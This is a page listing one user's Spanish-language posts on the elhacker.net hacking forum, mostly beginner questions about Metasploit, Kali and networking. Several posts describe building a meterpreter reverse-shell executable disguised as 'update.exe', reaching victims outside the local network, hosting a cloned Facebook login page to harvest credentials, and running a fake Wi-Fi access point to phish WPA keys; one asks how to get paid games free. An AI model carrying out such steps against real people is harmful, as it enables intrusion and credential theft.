elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / como configurar la base de datos en metasploit kali linux en: 4 Enero 2017, 20:44 pm
hola a todos tengo un problema con la herramienta metasploit, practicamente despues de hacer un escaneo de puertos a mi target decido buscar un exploit para el servicio ftp pero cuando digito el comando search name:ftp recibo un error como el siguiente
database is not conected or cache not rebuild
investingando por internet descubri que para resolver ese problema era necesario correr los serviciios de potsgresql y metasploit.
entonces procedi a correrlo antes de inciar msfconsole, pero el problema persistia.
decidi esta vez reiniciar el sistema pero al inicio cuando intente nuevamente correr los servicios recibo un error con la conexion con postgresql que dice que la conexion fracaso, lo mismo sucede con el servicio de metasploit.

a este punto no se que hacer para poder filtrar mis exploits
nota: estoy haciendo todo esto en un lab virtual con kali y metasploitable
2  Foros Generales / Sugerencias y dudas sobre el Foro / ideas para mejorar el foro en: 17 Noviembre 2015, 14:51 pm
sugiero al webmaster de instalar una chat para q los visitantes puedan comunicarse e intercambiar informacion , esto podria mejorar notablemente el rendimiento el foro,
primero podriamos elegir a un experto para responder a las preguntas en practica podria hacer turnos, esto para mi ahorraria a los mods trabajo y seria algo util  a todos
3  Seguridad Informática / Seguridad / ataque fuera de la red local (lan) en: 15 Noviembre 2015, 16:37 pm
como se realiza un atake externo?? tengo presente q se necesita hacer un port forwarding (redireccionar puertos)  he creado un troyano en metasploit con el modulo msfpayload
eh puesto mi ip publica en lhost, supongo asi cuando mi troyano se ejecute en un pc remoto, obtenga una sesion de meterpreter? pero no se si esto es posible, alquien me puede aclarar el procedimiento gracias :)
4  Seguridad Informática / Bugs y Exploits / Metasploit (windows) en: 14 Noviembre 2015, 16:12 pm
buenas a todos hackers, necesito vuestra soporte gracias
tengo entendido q metasploit framework es compatible con windows y no hay niingun problema con esto porque lo tengo instalado en una maquina windows 8 de 64 bits
entonces porque cuando intento crear un ejecutable de un payload conocido x todos
(windows-metepreter) desde el metasploit, he buscado en la red y solo me aparece q
el ejecutable se crea con MSFPAYLOAD,  la cuestion es porque no se puede crear un ejecutable desde MSFCONSOLE,  he probado a hacerlo asi
msfconsole msfpayload/windows/meterpreter/reverse_tcp lhost 192.x.x.x LPORT xxxx X > update.exe   me aparece  msfconsole no reconoce MSFPAYLOAD
entonces lo hago de otra manera
MSFCONSOLE use windows/meterpreter/reverse_tcp lhost 192.x.x.x LPORT xxxx X > update.exe .... resulta q no me crea ningun archivo
inntento a usar el comando save y darle un nombre, pero tampoco funciona
 existe un modo de crear un ejecutable desde msfconsole desde windows o
esto es exclusivo para sistemas linux??
 
5  Comunicaciones / Redes / configuracion del router para el servicio de noip en: 15 Junio 2015, 14:53 pm
hola a todos, quisiera saber como puedo configurar correctamente mi router thomsom v8 para correr el serivicio de noip, me sirve configurarlo para hacer un test de ingeniera social con setoolkit , primero que todo tengo una maquina virtual de kali linux con anfitrion windows 8, en practica cuando clono pagina falsa de facebook con la herramienta de "set toolkit" me crea 3 archivos
1- index html
2- post.php
3- harvester.txt
yo como quiero hacer una prueba fuera de mi red local lo subi a un servidor web en mi caso "mega" para que los archivos esten disponibiles siempre q quiera , bueno despues descarge el cliente de "no-ip" luego instale y configure el host que previamente habia creado (social.ddns) luego cuando  copie la direccion en mi navegador web firefox, va a la pagina de mi router (thomsom v8)  que puedo hacer para q
no me redireccione a la pagina de mi router y vaya directamente a mi archivo "index.html" ?
6  Foros Generales / Dudas Generales / Que es un Firmware? en: 2 Junio 2015, 15:17 pm
Por favor me pueden aclarar el termino firmware porque todavia no lo entendi bien
7  Comunicaciones / Redes / que diferencia hay entre el protocolo IP y el protocolo UDP en: 1 Junio 2015, 20:14 pm
quiero una respuesta breve y entendible, porque no entiendo mucho sobre las redes.
8  Foros Generales / Dudas Generales / como descargar juegos gratis de playstore en: 1 Junio 2015, 19:40 pm
necesito descargar alguno jugos de la playstore porque no encuentro el juego fisico en las tiendas saben de que manera se puede conseguir gratuitamente yo me asumo la responsabilidad
9  Seguridad Informática / Hacking Wireless / Urgenteee tengo un problema raro con WIFISLAX en: 31 Mayo 2015, 18:04 pm
Hola a todos soy nuevo usuario en esta pagina y esta es mi primera pregunta
 espero que me entiendan recientemete descarge  wifislax del sitio oficial y lo instale en un portatil con windows 8 lo inicio en modo live  tranquilamente luego abri la aplicacion
Linset para auditar la seguridad de mi modem con cifrado WPA/2 hize todos los pasos
puse en modo monitor mi tarjeta de red ather0s  y luego elegi mi red infostrada1234
desconecte la conexion y cree una red wifi falsa sin proteccion asta qui todo bien el problema es que no me aparece la red falsa desde mi otro computador windows xp
pero si me aparece en mi dispositivo android galaxis3 pero cuando abro una pagina no me aparece la pagina falsa pidiendome la clave, eh reintentado varias veces y no se arregla alguien podria decirme porque motivo no aparece la pagina falsa pidiendome la clave como deberia de ser y porque no puedo ver la red falsa desde un windows xp sp3 espero habersido claro y breve gracias por leer esto.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines